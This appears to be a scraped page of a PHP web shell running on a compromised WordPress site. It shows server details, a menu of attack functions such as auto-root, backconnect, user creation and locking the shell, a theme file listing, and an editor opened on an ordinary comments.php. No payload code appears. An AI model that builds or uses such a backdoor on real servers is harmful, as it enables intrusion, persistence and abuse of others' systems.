Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
twentythirteen /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
404.php
843
B
-rw-r--r--
archive.php
1.78
KB
-rw-r--r--
author-bio.php
1.09
KB
-rw-r--r--
author.php
1.69
KB
-rw-r--r--
category.php
1.12
KB
-rw-r--r--
comments.php
1.86
KB
-rw-r--r--
content-aside.php
1.39
KB
-rw-r--r--
content-audio.php
1.54
KB
-rw-r--r--
content-chat.php
1.33
KB
-rw-r--r--
content-gallery.php
1.99
KB
-rw-r--r--
content-image.php
1.84
KB
-rw-r--r--
content-link.php
1.51
KB
-rw-r--r--
content-none.php
956
B
-rw-r--r--
content-quote.php
1.38
KB
-rw-r--r--
content-status.php
1.18
KB
-rw-r--r--
content-video.php
1.84
KB
-rw-r--r--
content.php
2.3
KB
-rw-r--r--
error_log
166
B
-rw-r--r--
footer.php
923
B
-rw-r--r--
functions.php
23.4
KB
-rw-r--r--
header.php
2.03
KB
-rw-r--r--
image.php
3.19
KB
-rw-r--r--
index.php
1.01
KB
-rw-r--r--
page.php
1.66
KB
-rw-r--r--
readme.txt
4.11
KB
-rw-r--r--
rtl.css
12.88
KB
-rw-r--r--
screenshot.png
171.37
KB
-rw-r--r--
search.php
872
B
-rw-r--r--
sidebar-main.php
473
B
-rw-r--r--
sidebar.php
578
B
-rw-r--r--
single.php
612
B
-rw-r--r--
style.css
55.77
KB
-rw-r--r--
tag.php
1.15
KB
-rw-r--r--
taxonomy-post_format.php
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying Comments * * The area of the page that contains comments and the comment form. * * @package WordPress * @subpackage Twenty_Thirteen * @since Twenty Thirteen 1.0 */ /* * If the current post is protected by a password and the visitor has not yet * entered the password we will return early without loading the comments. */ if ( post_password_required() ) { return; } ?> <div id="comments" class="comments-area"> <?php if ( have_comments() ) : ?> <h2 class="comments-title"> <?php printf( _nx( 'One thought on “%2$s”', '%1$s thoughts on “%2$s”', get_comments_number(), 'comments title', 'twentythirteen' ), number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>' ); ?> </h2> <ol class="comment-list"> <?php wp_list_comments( array( 'style' => 'ol', 'short_ping' => true, 'avatar_size' => 74, ) ); ?> </ol><!-- .comment-list --> <?php // Are there comments to navigate through? if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav class="navigation comment-navigation" role="navigation"> <h1 class="screen-reader-text section-heading"><?php _e( 'Comment navigation', 'twentythirteen' ); ?></h1> <div class="nav-previous"><?php previous_comments_link( __( '← Older Comments', 'twentythirteen' ) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments →', 'twentythirteen' ) ); ?></div> </nav><!-- .comment-navigation --> <?php endif; // Check for comment navigation ?> <?php if ( ! comments_open() && get_comments_number() ) : ?> <p class="no-comments"><?php _e( 'Comments are closed.', 'twentythirteen' ); ?></p> <?php endif; ?> <?php endif; // have_comments() ?> <?php comment_form(); ?> </div><!-- #comments -->
Close